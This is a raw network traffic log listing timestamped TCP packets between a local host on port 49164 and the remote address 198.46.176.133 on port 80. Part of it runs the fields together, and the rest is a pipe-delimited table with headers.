                              Jul 29, 2024 16:15:08.679752111 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.679785967 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.679820061 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.679831028 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.679852962 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.679888010 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.679917097 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.680443048 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680499077 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.680689096 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680722952 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680757999 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680768967 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.680790901 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680824995 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680840015 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.680860996 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.680908918 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.681417942 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681451082 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681484938 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681493998 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.681518078 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681551933 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681564093 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.681587934 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.681639910 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.682053089 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760446072 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760502100 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.760546923 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760586023 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760627031 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.760730028 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760765076 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760797977 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760804892 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.760833979 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.760874033 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.761270046 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761305094 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761341095 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761348009 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.761373997 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761408091 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761415958 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.761442900 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761776924 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.761893034 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761925936 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761959076 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.761974096 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.761992931 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762027979 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762034893 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.762594938 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762629032 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762636900 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.762664080 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762696981 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762707949 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.762731075 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762763977 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.762772083 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.763464928 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763499022 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763514996 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.763533115 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763566971 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763575077 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.763601065 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763634920 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763648033 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.763668060 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.763716936 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.764344931 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764379978 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764414072 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764424086 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.764447927 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764491081 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.764499903 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764537096 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764569998 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.764574051 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.765245914 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765283108 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765290976 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.765312910 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765348911 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765357018 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.765383005 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765415907 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765425920 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.765450001 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765482903 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.765491962 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.766144991 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766179085 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766201973 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.766213894 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766247988 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766248941 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.766283989 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766318083 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766329050 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.766958952 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.766992092 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767004967 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767024994 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767061949 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767065048 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767090082 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767139912 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767375946 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767409086 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767443895 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767452002 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767477036 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767510891 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767517090 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767544031 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767577887 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767587900 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.767611980 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.767658949 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.768323898 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768357992 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768390894 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768400908 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.768424988 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768459082 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768471003 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.768513918 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768548012 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768552065 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.768584013 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768616915 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.768625975 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.769238949 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769273043 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769284010 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.769305944 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769340038 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769352913 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.769371986 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769406080 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769413948 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.769439936 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769474030 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769483089 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.769506931 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.769548893 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.770186901 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770220995 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770253897 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770265102 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.770289898 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770323038 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770329952 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.770358086 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770391941 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770400047 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.770426035 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770458937 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.770464897 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.771121979 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771156073 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771171093 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.771188974 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771234989 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771243095 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.771267891 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771301985 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771308899 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.771336079 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771368980 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771374941 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.771403074 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.771450996 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.772706032 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.772742033 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.772777081 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.772783041 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.772814035 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.772861958 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.846781015 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.846858978 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.846894979 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.846916914 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.847296000 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847342968 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.847367048 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847459078 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847460985 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.847492933 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847538948 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.847657919 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847843885 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847878933 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847891092 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.847913027 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847949982 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.847956896 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.848352909 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848387003 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848400116 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.848422050 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848455906 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848459959 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.848514080 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848546028 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848558903 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.848578930 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848613977 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.848620892 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.849220037 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849255085 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849291086 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849302053 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.849327087 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849359989 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849370956 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.849394083 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849428892 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849458933 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.849462986 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849498034 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.849508047 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.850095034 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850127935 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850138903 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.850162029 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850194931 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850203991 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.850229025 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850261927 CEST8049164198.46.176.133192.168.2.22
                              Jul 29, 2024 16:15:08.850272894 CEST4916480192.168.2.22198.46.176.133
                              Jul 29, 2024 16:15:08.850297928 CEST8049164198.46.176.133192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 29, 2024 16:15:08.850330114 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.850361109 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.850987911 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851022005 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851051092 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851068020 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.851084948 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851119041 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851130009 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.851152897 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851186991 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851198912 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.851221085 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.851262093 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852062941 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852097034 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852129936 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852144003 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852164984 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852199078 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852209091 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852232933 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852264881 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852279902 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852302074 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852436066 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852689028 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852724075 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852756977 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852771044 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852791071 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852824926 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852859020 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852865934 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.852891922 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852926016 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.852933884 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.853461981 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853497028 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853512049 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.853529930 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853564978 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853599072 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853611946 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.853632927 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853665113 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853668928 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.853699923 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853733063 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853739023 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.853765965 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853795052 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.853811979 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854298115 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854334116 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854357958 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854366064 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854399920 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854408979 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854434967 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854468107 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854495049 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854685068 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854717970 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854732037 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854753971 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854788065 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854795933 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.854823112 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.854866028 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.855076075 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.855206966 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.855240107 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.855274916 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.855289936 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.855627060 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.855679035 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.856168032 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856273890 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856308937 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856321096 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.856421947 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856468916 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.856477022 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856524944 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856559992 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856570959 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
Jul 29, 2024 16:15:08.856955051 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.856987953 CEST | 80 | 49164 | 198.46.176.133 | 192.168.2.22
Jul 29, 2024 16:15:08.857002974 CEST | 49164 | 80 | 192.168.2.22 | 198.46.176.133
